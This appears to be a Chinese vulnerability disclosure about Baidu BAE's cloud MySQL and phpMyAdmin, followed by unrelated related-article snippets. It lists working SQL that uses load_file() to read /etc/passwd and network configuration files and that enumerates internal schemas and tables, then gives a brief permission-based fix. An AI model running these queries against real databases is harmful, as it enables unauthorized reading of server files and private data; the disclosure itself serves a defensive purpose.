通過一定方式可讀取資料庫相關內容,檢視伺服器檔案等。
mysql(雲資料庫) phpmyadmin管理時,insert into 表 select load_file('/etc/passwd')等可讀取本地檔案內容,也可查詢information_schema庫內容。目測是讀和寫操作使用了不同的資料庫賬號。
/* 以下結果是不同的 */
select user();
insert into tmp(data) select user();
/* 一些可執行的操作 */
//檔案讀取
insert into test(data) select load_file('/etc/passwd');
insert into test(data) select load_file('/etc/issue');
insert into test(data) select load_file('/etc/sysconfig/network-scripts/ifcfg-eth0');
//資料結構讀取
insert into test(data) select load_file('/etc/sysconfig/network-scripts/ifcfg-eth1');
insert into test(data) select schema_name from information_schema.schemata limit 10;
insert into test(data) select concat('databases:',count(*)) from information_schema.schemata;
insert into test(data) select concat('ibase_bae_code tables:',group_concat(table_name)) from information_schema.tables where table_schema='ibase_bae_code';
insert into test(data) select concat('ibase_bae_code.apps columns:',group_concat(column_name)) from information_schema.columns where table_schema='ibase_bae_code' and table_name='apps';
insert into test(data) select concat('ibase_bae_code tables:',group_concat(table_name)) from information_schema.tables where table_schema='ibase_bae_code';
insert into test(data) select concat('ns_bae_yun_pma tables:',group_concat(table_name)) from information_schema.tables where table_schema='ns_bae_yun_pma';
insert into test(data) select concat('ns_bae_yun_pma.pma_session columns:',group_concat(column_name)) from information_schema.columns where table_schema='ns_bae_yun_pma' and table_name='pma_session';
修復方案:
控制檔案和資料庫操作許可權,修復時注意通過平台上的資料匯入也是可以執行的。
百度BAE資料庫連線問題
安裝cms到這一步的時候,我們首先要在管理中心 雲環境 服務管理 mysql資料庫 選項中建立乙個資料庫,記住資料庫名稱,即這裡的資料庫名。資料庫的賬號和密碼分別是基本資訊裡面的api key 和 secret key,這樣還不行,單擊下一步後還是提示資料庫連線錯誤!我一直懷疑是資料庫的賬號和密碼錯...
百度BAE資料庫連線問題
安裝cms到這一步的時候,我們首先要在管理中心 雲環境 服務管理 mysql資料庫 選項中建立乙個資料庫,記住資料庫名稱,即這裡的資料庫名。資料庫的賬號和密碼分別是基本資訊裡面的api key 和 secret key,這樣還不行,單擊下一步後還是提示資料庫連線錯誤!我一直懷疑是資料庫的賬號和密碼錯...
從百度文庫看企業內部資訊洩漏
本篇文章版權由 ecf和 hp所有 許多企業的cio都認識到,知識管理將會是企業資訊化的一大熱點,也是為企業持續輸出it價值的核心之一,方向沒有錯,但能夠把知識管理做到位企業卻著實不多,這是為什麼呢?就拿朋友小張最近碰到的乙個難題來說,他在一家軟體企業供職,歷史專案資訊的沉澱,是一筆巨大的財富,特別...